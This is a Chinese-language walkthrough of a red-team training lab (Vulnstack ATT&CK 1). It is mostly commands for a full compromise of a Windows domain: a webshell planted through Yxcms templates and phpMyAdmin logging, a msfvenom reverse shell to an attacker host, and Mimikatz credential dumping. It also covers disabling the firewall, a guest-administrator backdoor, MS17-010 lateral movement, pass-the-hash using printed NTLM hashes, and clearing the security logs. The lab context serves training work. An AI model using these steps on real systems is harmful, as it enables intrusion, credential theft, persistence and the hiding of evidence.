ATT&CK实战系列—红队实战-1

0、靶场介绍

ATT&CK实战系列—红队实战（一）是红日安全团队出品的一个实战环境，该靶场模拟真实环境。
拓扑图如下：

‌靶场配置如下：
靶场下载链接：http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

1、信息收集

• 指纹信息
  
• 端口服务
  
• 目录信息
  
• 信息汇总
  

2、漏洞分析

2.1 漏洞挖掘

• 目录浏览
  
• 备份文件

http://192.168.1.131/beifen.rar

• 敏感信息
  
• 管理后台

2.2 漏洞扫描

nmap 192.168.1.131 --script=auth,vuln,ftp-brute,imap-brute,smtp-brute,pop3-brute,mongodb-brute,redis-brute,ms-sql-brute,rlogin-brute,rsync-brute,mysql-brute,pgsql-brute,oracle-sid-brute,oracle-brute,rtsp-url-brute,snmp-brute,svn-brute,telnet-brute,vnc-brute,xmpp-brute

2.3 漏洞验证

http://192.168.1.131/yxcms//index.php?r=admin/index/login

http://192.168.1.131/phpmyadmin/

3、漏洞利用

​3.1 Yxcms 后台 Getshell

利用yxcms 版本漏洞getshell。在“前台模板” 中看见自己可以编辑模板，模板通常可以自定义php文件，而如果可以自定义php文件直接就可以上一句话木马了
通过目录浏览漏洞，或者备份文件找到上传路径，然后使用蚁剑连接： http://192.168.1.131/yxcms//protected/apps/default/view/default/testinfo.php

3.2 phpmyadmin 日志 getshell

Phpmysql 日志 getshell 当secure_file_priv的值为null ，表示限制mysql 不允许导入|导出

当into outfile被禁用的话 可以利用日志getshell,原理，phpmyadmin有一个记录日志的文件，但是一般情况下会关闭，开启日志记录，然后设置日志记录名称为.php，随便执行sql语句，只要包括一句话木马就会被写入到日志中去，然后就可以连接getshell SHOW VARIABLES LIKE “general_log%”

第一步手动开启日志。
set global  general_log='on'   //首先设置为on
第二步 修改日志路径
set global  general_log_file ="C:\\phpstudy\\www\\shell.php"
然后 查看是否开启成功

然后只要执行的语句都会写入到日志文件中，所以我们查询语句
select '<?php eval($_POST['a']);?>'
虽然报错但已经写进去了

查看日志文件，使用蚁剑连接：

3.2 主机信息收集

网络配置信息	ipconfig /all

当前权限、账号信息	
whoami /all
net user XXX /domain

操作系统、软件版本信息	
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
echo %PROCESSOR_ARCHITECTURE%
wmic product get name,version

本机服务信息	wmic service list brief
进程列表	tasklist /v 
wmic process list brief

启动程序信息	wmic startup get command,caption
计划任务	schtasks /query /fo LIST /v
主机开机时间	net statistics workstation

用户列表	
net user
net localgroup administrators
query user || qwinsta
客户端会话信息	net session
端口列表	netstat -ano
补丁列表	
Systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn 

查询本机共享	
net share
wmic share get name,path,status

路由、ARP 缓存表	route print、Arp –A

防火墙相关配置	netsh firewall show config
代理配置情况	reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
远程连接服务	Netstat -ano
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

4、权限提升

4.1 使用 msf 提权

使用 MSF 进行提权并且抓取散列值和明文密码:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.136 LPORT=12345 -f exe -o payload.exe

4.2 dump hash

获取账号密码
1、使用kiwi模块
getsystem ##提权到system权限
migrate id号 ##该模块默认是加载32位的系统，所以如果目标主机是64位系统的话,需要将meterpreter进程迁移到一个64位程序的进程中
load kiwi ##加载kiwi模块
creds_all ##列举系统中的明文密码

4.3 远程登录

使用账号密码进行远程登录
查看3389：
netstat -ano | findstr "3389"
或者查看远程端口
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber
开启3389
Windows Server 2008 和 Windows Server 2012 中开启 3389 端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看防火墙配置
netsh firewall show config

关闭防火墙：
Windows Server 2003 系统及之前版本
netsh firewall set opmode disable
Windows Server 2003 之后系统版本
netsh advfirewall set allprofiles state off
或者
允许 3389 端口放行，命令如下:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

5、权限维持

5.1 guest 后门

临时创建一个guest 后门:
net user guest /active:yes
net user guest test@123456
net localgroup administrators guest /add

6、横向渗透

6.1 代理转发

使用msf 的 socks 模块搭建一个socks 代理

测试一下是否搭建成功：

6.2 信息收集

• 域内信息收集

• 主机存活

use auxiliary/scanner/netbios/nbname

use auxiliary/scanner/smb/smb_version

• 端口扫描
  
• 漏洞扫描

auxiliary/scanner/smb/smb_ms17_010

6.3 横向渗透–域成员

use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set command net user admin123 hongrisec@2022 /add #添加用户
run #成功执行
set command net localgroup administrators admin123 /add #管理员权限
run #成功执行
set command  "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" 
run #成功执行

6.4 横向渗透–域控

set command "net user admin123 hongrisec@2022 /add"
set command "net localgroup Administrators admin123 /add"
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
set command "netsh firewall set opmode mode=disable"

• 其他利用方式

利用该模块获取域控：
Exploit/windows/smb/ms17_010_psexec

• 账号密码&哈希
  

Username       Domain  LM                                NTLM                              SHA1
--------       ------  --                                ----                              ----
Administrator  GOD     edea194d76c77d87237cc0a5cbc3c059  a45a7246dd74b64a67f22fd7020f1bd8  09c1149077362aea72932d6a067034e4b2de24ca
STU1$          GOD                                       0140e2337bada42e378bf20b6342013b  1e54171adbcbb0b85c030c1abba09a3eb6c76a47

使用 wmi 进行横向渗透

proxychains4 wmiexec.py -hashes 00000000000000000000000000000000:a45a7246dd74b64a67f22fd7020f1bd8 Administrator@192.168.52.138

7、痕迹清理

有远程桌面权限时手动删除日志：
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志

wevtutil：

wevtutil el             列出系统中所有日志名称
wevtutil cl system      清理系统日志
wevtutil cl application 清理应用程序日志
wevtutil cl security    清理安全日志

meterperter自带清除日志功能：
clearev     清除windows中的应用程序日志、系统日志、安全日志

清除recent：
在文件资源管理器中点击“查看”->“选项”->在常规->隐私中点击”清除”按钮
或直接打开C:\Users\Administrator\Recent并删除所有内容
或在命令行中输入del /f /s /q “%userprofile%\Recent*.*